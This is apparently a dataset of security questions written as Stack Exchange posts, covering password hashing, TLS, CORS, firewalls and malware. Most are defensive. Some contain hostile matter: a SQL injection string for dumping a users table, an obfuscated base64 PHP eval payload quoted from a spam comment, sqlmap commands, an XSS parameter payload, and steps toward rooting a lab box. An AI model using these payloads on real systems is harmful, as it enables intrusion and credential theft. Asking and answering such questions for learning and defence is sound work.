instruction
stringlengths
24
29.9k
This is just for learning purpose. I want to get all the usernames and passwords from a table in a MySQL server, where "magic quotes" have been disable. In the input for the username: I put something like: username'; SELECT * FROM users; But how can I get the input of my injection query? I did some research, and found...
I've been considering the security of the iPhone 5S fingerprint feature. My main concern is, not that someone could replicate my fingerprint in the physical world and bypass the phone, however that someone could reconstruct my fingerprint based on the digital signature that is stored in the phone. Is the fingerprint st...
This is how my key is set up: pub 4096R/AAAAAAAA created: 2012-11-14 expires: 2013-11-14 usage: SC trust: ultimate validity: ultimate sub 4096R/BBBBBBBB created: 2012-11-14 expires: 2013-11-14 usage: E [ultimate] (1). xxxx <xxxx@xxxx.com> I know this is standard, to have the subk...
How secure is checking the automatic authentication option in Skype client? What if I sign in with Microsoft account instead of Skype id? What if both accounts are merged? Is there any documentation on how it works in recent versions? For example, whether it stores a plain text password, or how easily it can be retriev...
Security through obscurity isn't real security. That's why theoretically, closed source software is a wrong solution. A software, example an operating system still needs to be secure when all of it's elements are known to source code level, only the private keys are kept secret. Q: Who are the people (that w...
Using OpenBSD for example, we have a task to serve static html files, no php/cgi/etc. Q: What would be more secure? Using a default apache/nginx -OR- using (KISS principle) a chrooted www server that is just one lines long? Example: python -m SimpleHTTPServer p.s.: anybody know a more secure solution then the python...
Stuxnet and others in this list of state-of-the-art Internet worms had certain features that they were very stealthy in leaking out the information they harvested. Thus it managed to go under the radar and would typically go unnoticed by IDS/Firewalls. Stuxnet also had a feature that the infected machines contacted and...
Let's say I need to write a simple application for signing/checking some data. The hard part is, that it must be FIPS 140-2 compliant. I was thinking to do it using OpenSSL FIPS Object Module 2.0 but then I noticed the "I.G. 9.10 issue". However, This document states that "The I.G. 9.5 issue has effectively precluded ...
This question may just show a distinct misunderstanding of things on my part, and I apologize if it is, but I thought I'd put it out here as I don't know where else to ask. I've been thinking about the issues with attempting to host a fully encrypted server in a remote location - this obviously is realistically almost ...
I am doing a course on cryptography, and there I learned that the major security goals are Confidentiality Integrity Availability Also I Learned that ITU-T provides 5 different security services Data confidentiality Data Integrity Authentication Non-repudiation Access Control If there are only 3 security goals, why ...
Suppose the following scenario: 1- A web app (on WEBSERVER1) and its database (on DBMS1) having very sensible information deployed in the same physical server (lets said that for simplification). Users interact with the the web app under the umbrella of specials securities measures, these security measures take in cons...
I understand the purpose of the Access-Control-Allow-Credentials header, but can't see what problem the Access-Control-Allow-Origin header solves. More precisely, it's easy to see how, if cross-domain AJAX requests with credentials were permitted by default, or if some server were spitting out Access-Control-Allow-Cred...
I understand that using MD5 is not safe and is not PCI compliant. Does using BCrypt satisfy PCI compliance
How to prevent a host machine from sending/receiving packets with the following network configuration: eth0 - physical NIC :: not configured; tun0 - virtual NIC for VM which role is the gateway for other VMs :: auto configured (dhcp), has Internet access, receives ip from the router (192.168.1.1/24); tun1 - virtual NIC...
Im new to hacking, i have reached a chapter in my book "the web applications hackers handbook" where im about to start bypassing client-side and actually attacking different technologies well before i proceed i see mapping as an essential must expertise i looked in Google for software came around Burp Suite, is quite e...
Is it reasonable to refuse to guarantee that you will find 100% of security issues when doing a vulnerability assessment on a website? Even with companies like Google that have teams of security professionals, an occasional security vulnerability slips through. There are also zero day security issues with third party ...
I'm trying to install a Thawte SSL123 certificate on OS X 10.8.5, but having a difficulty. While the certificate and intermediates appear to be installed without any errors, running the Qualys SSL Labs report produces a "Chain issues Contains anchor" message. Running openssl s_client -showcerts -connect externalcorte...
This will sound naive for sure, and it is. Being a recent college graduate, I have been wondering on how do average websites implement their authentication modules. I have been using a table storing username and hash(password) and their roles (for authorization). All I do is string-matching and done! Then install an SS...
This is something I haven't been able wrap my head around, if BREACH allow leaking of information, do we have to mask or generate CSRF token in a time-based or per-request fashion to make it more secure? As far as I know, session-based CSRF token can protect user from CSRF just fine. But how accurate is this in context...
Could it be more secured using the "HTTPS" protocol for website data security and at the same time using another encryption algorithm (Elgamal) as well? I know "HTTPS" could be used alone, but I found according to these links (Gone in 30 seconds - New Attack on RSA-based SSL/TLS Protocol) that it could be attacked, and...
I'm wondering whether besides collecting the typical tracking information (IP + cookies) google has already implemented browser fingerprinting? I read sometime not long ago about it being a hypothetical future method for tracking and identifying google users and would like to know if it's already in use officially?
Based on this IE zero day, I'm interested in listing all DLLs in our systems that have been compiled to not work with ASLR. Ideally, I'd like to analyze a static file and not load it into memory to detect if it's compiled without ASLR protections. Lastly, once I have a list of files that are incompatible with ASLR, w...
This article states: Brute-force techniques trying every possible combination of letters, numbers, and special characters had also succeeded at cracking all passwords of eight or fewer characters. There are 6.63 quadrillion possible 8 character passwords that could be generated using the 94 numbers, letters, and symb...
I am creating a packaged C++ library for creating http/https clients/servers. As part of that, I am planning on using either the botan (http://botan.randombit.net/) or openssl tls wrappers. My library will be open-source (hosted on github) and also have downloadable binaries available so the user can start using it im...
It is often suggested, for air-gapped PC's, to use CD/DVD's as a transfer medium between machines instead of USB sticks or portable hard-drives as it is difficult to write data to a CD/DVD without the user noticing. I am wondering if there are any known attacks against this type of scenario? I'm not sure its possible ...
I am new to implementing information security. However i am trying to harden a windows server.I am using regedit to create parameters like SynAttackProtect,TcpMaxHalfOpen and TcpMaxHalfOpenRetried and set values to them. But i am not sure if this is a good way to do it. As in i browsed to this location HKEY_LOCAL_MACH...
Using OAuth you have a consumer key and consumer secret to identify your application and the user provides an OAuth access token and secret to authenticate your application access to their account, say Twitter. Lets says you are developing a desktop application in Python that has to Twitter functionality that uses OAut...
I have a C# REST API which exposes some methods over the HTTP protocol. The API is intended to be used my my Android applocation (Java) which is currently in the makings. Since the app is in an early development stage, and hasn't been released yet, I access the API methods using http://example.com/resources/item17 with...
I'm reading a lot about implementing security constraints to a REST API. There are a lot of methods, some better than others for 3party applications or to consume my own API. HTTP Basic + TLS (with keys) HTTP Digest + TLS OAuth 1.0a, 2.0 Application-only-auth (with keys) link Amazon Signature Version 4 Link To consum...
Is there any way for me to access the main computer if the VM has been infected? Let's say that I am running Debian or ubuntu in a VM and the main computer uses Windows (or other way around just so that OS is as different as possible). And let's say that the VM has been accessed and is full of viruses and such. Is the...
I'm looking into implementing an ownership check on JSON objects and want to avoid going back to the database to ensure ownership of said object/record (i.e., to prevent a user from updating an object/record they do not own - mostly CRUD operations). This would occur in the context of a web-application/service api. My ...
I'm thinking of this attack on Tor, which I'm sure won't work, as it is much too simple. Mr. Blackhat sets up lots of intermediate nodes. However, whenever TCP connections come in, they are given very poor service. Connections are purposefully dropped, interrupted, resetted, sent into delay pools, etc. Mr. Blackhat als...
I'm configuring my mac and encrypting my disks with FileVault 2. As the boot disk is encrypted at startup I have to login via the EFI partition before the OS will boot. From my understanding, most people who have investigated FV2 think it's a pretty decent FDE solution. However it appears to be vulnerable to keylogge...
I have collected over many, many years data from many sources, some of which could be questionable - for example an upload page on a web server at home - to the point where I don't completely trust the integrity of the data. My current plan is to set up a sacrificial laptop that can be reinstalled easily, running a dec...
I know utilities such as last exist - but not sure if it's applicable for my needs - I'd like a system to notify me of any login attempts on any of my macs (home, work or remote). Attempts from a physically at the machine, or via ssh, Telnet, FTP, scp, sftp, vnc etc, etc. I also know of a few commercial products but th...
Suppose you have a file that you wish to maintain two encrypted versions of, each version encrypted with its own (randomly generated, sufficiently long) key. The actual method of encryption is by creating two TrueCrypt (AES) volumes of the same size and copying the file into each of these volumes. The plaintext versi...
I worked in web hosting for several years, particularly security. I am familiar with PCI compliance and I would say the "short and sweet" guide to PCI for an eCommerce store is as follows: Client goes to the bank and gets a merchant account. Merchant tells the client to use some random "authorized scanning vendor" (A...
Hello Currently I am setting up a server for college students (this includes tech-savy IT students as well) and I will be using IIS 7.5 with Webdav for the students to access their files from home. The built-in Webdav filters out all dangerous file extensions (php,asp,etc dangerous server code) and I was wondering if t...
I sent an email to person in Russia, and tracked it with Right Inbox, when the email is opened I get notified. The problem is I get 2 different IP addresses, one in Russia, and one in the US, both opening the email at the same time? This usually occurs when sending email via gmail to a gmail recipient. How can a gmai...
I am trying to find information on how to encrypt something in such a way that there are n keys, and k of them are needed for decryption. However, I have been searching Google for half an hour but because I do not know what this is called (and am apparently bad at searching), I cannot find it. EDIT: preferably such tha...
I'm using Comodo Firewall and I noticed that sometimes I'm getting TCP IN connection from another IP address in my home network (only one router and few wireless users): TCP IN | 192.168.1.50 | 192.168.1.75, where firs address is source and second one (my address) is destination. Why this is happening? Could it be a s...
i have a question: i'm trying to understand a specific point in android encryption. All the encryption keys are software based and are stored locally on the machine, so correct me if i'm wrong but doesn't it mean that attacks on android phones where the attacker gains root access means that the attacker can retrieve th...
Just I want to know, is it possible to extract header data by 'Man in middle attack' in HTTPS connection and is there any other way or hack to achieve same thing? If there is way to hack, is it possible to prevent such kind of hack?
I am currently developing a product that involves two network situations. At the client side, multiple computers form a P2P network (multiple locations, multiple p2p networks), and a subset of nodes of each network establish a connection with a subset of servers we host (for data exchanges, updates). All servers and cl...
OK so I just started working for a security consulting firm and we recommend SHA 256 (with salt) for password hashing because MD5 is too weak. I have read some brilliant answers (the list is too long!!!) on sec.SE about password hashing over last few months and it would be a sin not to try and prove it to my colleagues...
Suppose I wanted to run some manual checks to see if my Windows 7 machine has been infected. I don't usually do anything to get it infected, but I would like to check whether the below steps are enough to provide me with a basic level of assurance that it has not been infected. In this scenario, consider the machine do...
Seeing as phishing is getting more popular and users are becoming less concerned about security, I am trying to come up with a solution for a new site of mine that can stop phishers. For instance, any one can create a new site that looks exactly like Gmail and phish users to it in order to obtain their UN/PW. However, ...
When pasting the certificate blob in the configuration editor in IIS 7.5 for one on one authentication, is this the server certificate or the client certificate?
So, I'm just a programmer -- I don't know much about cryptography so bare with me and my lack of knowledge in this realm. But essentially, I'm wanting to cache data that could be potentially volatile ( ie -- change or delete over time ). One solution I've thought of would be to encrypt the data ( server side ) and admi...
I'm trying to make a service that keeps as little data on its users as possible. To that end, I want to make sure that someone using forensic tools won't gain any more information than I would by looking at my database or filesystem. In other words, you shouldn't be able to go through my hard drive with a hex editor an...
I am wondering whether a website you are accessing can tell if you are using a VPN or not based on your IP address? I have done some Google research and it appears, that this is the case. However, I am not exactly sure whether it is different if you use a dedicated IP from a VPN service instead of a dynamic IP address...
I am new to Networking. In our organization we try to setup gateway for security purpose so that we can block certain harmful websites. All I know is gateway is a device. What we have is the LAN setup, Mikrotik router (to assign static IP for every computer in our company). The details I know is default Gateway, subnet...
Recently Akismet asked me to moderate a possible spam comment on my blog. It was: <!--mfunc eval(base64_decode("ICRmaWxlID0gZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pIC4gJy8nIC4gJ3dwLWluY2x1ZGVzL3lkZXNrLnBocCc7ICRzcmMgPSAnPD9waHAgZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgiRFpaSERxd0lFa1R2MHF2L3hRSW92RWE5d0h0WGVEWXR...
Recently I learned about the difference between DROP and REJECT in a firewall. I understand that REJECT is better because it closes the connection immediately instead of waiting for timeout as DROP does, and also it's better for troubleshooting. I think this is of benefit for a server which handle many connections, b...
Are there any reports or statistics that describe the numbers or types of malware attacks on different operating systems, such as Linux, Unix, Windows, MacOS?
I recently created my own IIS server (set on version 7.5) and I was going through checks to make sure my webdav is not vulnerable. My users need to upload files to their individual accounts and can access them via a direct server link, and at the moment I have disabled all server-side/dangerous scripts from being uplo...
I'm trying to edit a particular section inside the Local Security Policy snap in and I'm wondering if I really need to give all of these groups (I think they're groups) permissions. Based on this information I may remove the same groups from other parts of the snap in but these look strange particularly the number one...
Can Biba model always be combined with Bell-LaPadula model? What are the issues that arise?Would there be conflicts?How would information flow be affected?
Initial situation: A RESTful webservice defends against CSRF attacks by using the double submit cookie approach. This means that the authentication token gets submitted twice and verified at the service side. Problem / Security Threat: The WebView element of the android and iOS plattforms allow to create a malicious we...
I am using http://www.mybrowserinfo.com/ to gather some info about me while browsing. I want to change my OS to appear that its a Windows Xp machine.(No VM solutions please:D) If you have any related material how this sites fingerprint you please add it also.(same way as Nmap ? specifics in TCP/IP stack ?)
When I go to http://get.adobe.com/flashplayer/ 'Install Now' will redirect me to their homepage without downloading the update or any explanation. What could be going on? Is some malware redirecting me? (Running Mac 10.8.4 tried both Safari and FF) Note: I have Ghostery and Adblock installed, tried disabling them. I ...
A "reputable" education company that my university utilizes for it's Physics course online materials sent my plaintext password in an email after using the Forgot Password? tool. I know that this is bad practice and is a little disconcerting coming from a prominent "reputable" corporation. What I want to know is if i...
I am just wondering what all the security experts think of my method for password hashing. I want to come up with a method I can use for all my future web development projects. First I create a random salt based on a 32 byte array : RNGCryptoServiceProvider provider = new RNGCryptoServiceProvider(); byte[] randomNu...
in the past when I wanted to block outsiders from attempting to start connections with my Linux machine's various TCP services, what I was told to do was to add this line to /etc/hosts.deny: ALL:ALL Everyone said that configuring a proper firewall on Linux is much more difficult than on BSD etc., so just do this one...
Ran into an interesting situation with Kismet and Airmon-ng while observing a client wireless network. Basically, I'm observing the network using airmon-ng, and I have my BSSID and frequency set to the specific network I'm looking at. When I view the airmon output (the .csv file with several columns like BSSID, first t...
Can anyone point me in the direction of some good tutorials regarding how to identify the type of vulnerability as reported by !exploitable and where to go from there? Essentially I've got myself a small fuzzing lab setup and I'm trying to broaden my understanding of exploit research and development. So I've got an app...
Android supports using facial recognition for unlocking your phone. How secure is that mechanism? For instance, if someone has a good quality picture of your face, can they defeat the facial recognition scheme by holding up the picture to the phone? Does the Android mechanism include any method of testing "liveness" ...
A quick Google search doesn't reveal whether it is important to logout of webapps (online banking, Amazon, Facebook, etc.), or if I am safe just closing the tab or browser. I am sure I heard on some TV show that it's best to logout... What possible threats am I exposing myself to if I don't properly log out?
Suppose there is a web application under public load that runs under a very restrictive MAC (e.g., SELinux, TOMOYO, Grsecurity) policy. Suppose we detect and log a MAC policy violation like a file being read or written by the web application that shouldn't be. Can this MAC policy violation be tracked back to a HTTP req...
Occasionally, I get spam that includes in the subject line an unusual name or word that appears in other (legitimate) messages I recently received. Perhaps a coincidence, I thought, until it happened twice in recent days with unusual words that the spammer, somehow, managed to pick from other messages. This morning a f...
I want to authenticate a (2nd stage) bootloader during the boot process using a symmetric key, which is derived from HW properties of the platform the bootloader is running on. Thus, I want to bind the bootloader to the hardware platform. What I have got to work with are the following elements: the binary B (2nd stage...
My company uses strict ACLs for the connection between two boxes. What are the benefits of these?
A couple of friends and I are looking for an open source video conferencing software. We'd like to run the server on a Debian box, but the clients are Windows machines. Most importantly, it should support encrypted video calls. It would be very cool if it would also allow conference calls (i.e. more than two people hav...
Today, I visited some sites of the German DHL group. While Chrome and Safari complain about an invalid certificate of Firefox accepts it. Which one is right, which one is wrong? Which decision should a user trust? This is what Safari reports: To make this situation a bit more complicated, Firefox and Chrome accep...
I am trying to practice ethical hacking in my own lab. I have got limited shell in a fedora box in addition I am able to read root files like /etc/shadow trough another vulnerability. Now, I need to get the box rooted, I tried to crack the root hash in /etc/shadow but no luck. I though of getting in using ssh keys. I m...
A few days ago, I visited an SSL protected website. Since Safari complained about the SSL-certificate, I did a short inspection: The certificate was issued by GoDaddy in just the minute I visited the site. While this might have been a matter of chance, I don't believe. Therefore, do CAs exist, which issue SSL cert...
In case that a malicious mobile app hasn't the appropriate permissions to e.g. download a file, it can invoke a browser to download sth. Concrete examples of such an attack are shown from page 27 to page 29 in Android Security Architecture. I want to make sure that my mobile application isn't susceptible to this kind ...
Have there been any instances of malware or spyware packaged in custom ROMs, for example a malicious email app pre-installed that records your server IMAP username and password and forwards it to a 3rd part? Or part of the kernel that takes periodic photos? With regard to custom ROMs, I mean official and unofficial rel...
I am looking at oracle security. What is a random oracle? Does a random oracle exist? How is the random oracle behavior approximated in the real world?
I would appreciate if you take some time to go over issue I am facing. On my laptop I have windows 7 installed, I am using ESET Smart Security 5.2.9.1. As I work 9 hours day online I am seeing a message remote IP scan detected by ESET notification in red, not in green. Which is giving me an idea that someone is going t...
By chance, I typed gpg2 --search myemailaddress on the command line, and searched public keyservers for my email address (I'd actually just meant to search my local keyring, for which I should have used gpg2 -k myemailaddress). To my surprise, I discovered that there was a public key, created just a few days ago, which...
I have an application that generates the /etc/network/interfaces file for connecting to the users wifi network. This application uses wpa_passphrase to generate the psk, which is then copied into the interfaces file. is exposing the psk in /etc/network/interfaces a security risk? For example: (the passphrase in this c...
An external software provider is hosting a website for us. We supply the login functionality via a restfull api(login/password over ssl). But the website is also the client for OAuth resource that it can access. This would imply that the user of the website who is already logging in with it's website credentials should...
One time while I was printing my documents at a copy center, I saw they dragged-and-dropped my PDFs from my flash drive to their desktop. How do I protect my files without using password? Is there a way to make a file open once and after that encrypt it?
The first 16 bits of the message digest in a PGP signature are translated in the clear. As we know, sending something in clear text does not sound like a very good idea from a security point of view. But PGP does this. Why clear text is used in this way in PGP?
I'm currently implementing a SSL-proxy, and have run into some problems regarding certificates. We have a offline "Company Root CA", and an online "Company intermediate CA". On the proxy I have generated a "proxy intermediate CA", which again has been signed by our "Company intermediate CA". All browsers trust both o...
I'm currently facing this possible reflected XSS vulnerability on a webapp: URL = http://www.test.com/login/?login=[PAYLOAD] When a user clicks on this link, it displays a login page that includes the following code: <a href="http://www.test.com/login/[PAYLOAD]><img...></img></a> I tried to close the <a> tag using > w...
Lets set out a scenario, a database has been dumped and all the passwords are hashed. You notice that some users seemed to have signed up twice and have the same hash. You run these hashes through your hash cracking program and nothing comes up, presumably because they are salted and you don't have the salt. But becau...
As per http://projects.webappsec.org/w/page/13246945/Insufficient%20Transport%20Layer%20Protection , we have been recommended to stop using RC4-MD5. The clients supported by our Application are IE 8 and above, Safari 5 and above, Chrome 18 and above , FF 12 and above, Mobile safari for iPhone, iPad. Ofcourse we want ...
While I was searching for the differences between cookie and session, I came across two of the following statements session data is stored on the server, while cookie data is stored on the client. session data available for the browser run, after closing the browser we will lose the session information. Source Link ...
There is a chipset I am working with that utilizes an ARM cortex -A7 as the Application processor and an ARM 9 Baseband processor. I had a major concern since the ARM cortex A7 is utilizing android that the MPU and/or MMU could be subverted to see the whole DRAM which includes the ARM9 side as well. Although the archit...
One of my hosting providers is sending a new password in plain text per e-mail, on request. How insecure is this practice? What would be a good (more secure) alternative to this?
Background Last month I noticed lots of failed emails in my inbox and after few minutes I lost my access to my Yahoo Mail. My friends informed me that they have received spam emails from me. So I called Yahoo customer care and they helped restore/reset my password and I then made a very strong password. I was at peace...
We have an email policy that prevents email from going through if it has password protected archive files attached. This is to protect users from viruses and trojans because the contents of the archive can't be scanned. However, this gets rather inconvenient when clients need to send us confidential data as we have to ...
After the Lavabit shutdown, Ladar Levison (founder of Lavabit) announced that he’s "looking into setting up a site where users can download their data". Such a site is now online: https://liberty.lavabit.com/ (currently it only offers to change your password) The page says: Due to concerns about the continued integrit...
so i just started up with sqlmap to learn sql injection vulnerability on my application. Here I followed steps as per some tutorials. So this are the steps which i followed : sqlmap.py -u "http://www.myurl.org/dis/data.php?id=3" --dbs Console displays : [11:19:45] [INFO] testing connection to the target URL [11:19:46...
Requirement I have a web service I need to expose on the DMZ for external communication. The web service communicates directly with a critical database that sits on an internal net. Current solution This is currently solved by having a service exposed in the DMZ, the endpoint is secured using a cert and it's using htt...
I need some help for my understanding while reading through this authentication scheme in WEP. In a WEP authentication scheme, the station first sends a request for authentication. However, this authentication scheme is a one-way authentication because it does nothing to prove to the station that the access point knows...
The W3C CORS recommendation states: Certain types of resources should not attempt to specify particular authorized origins, but instead either deny or allow all origins. ... 3. A GET response whose entity body happens to parse as ECMAScript can return an Access-Control-Allow-Origin header whose value is ...
What is the safest way that I could could hash/encrypt a password for my website?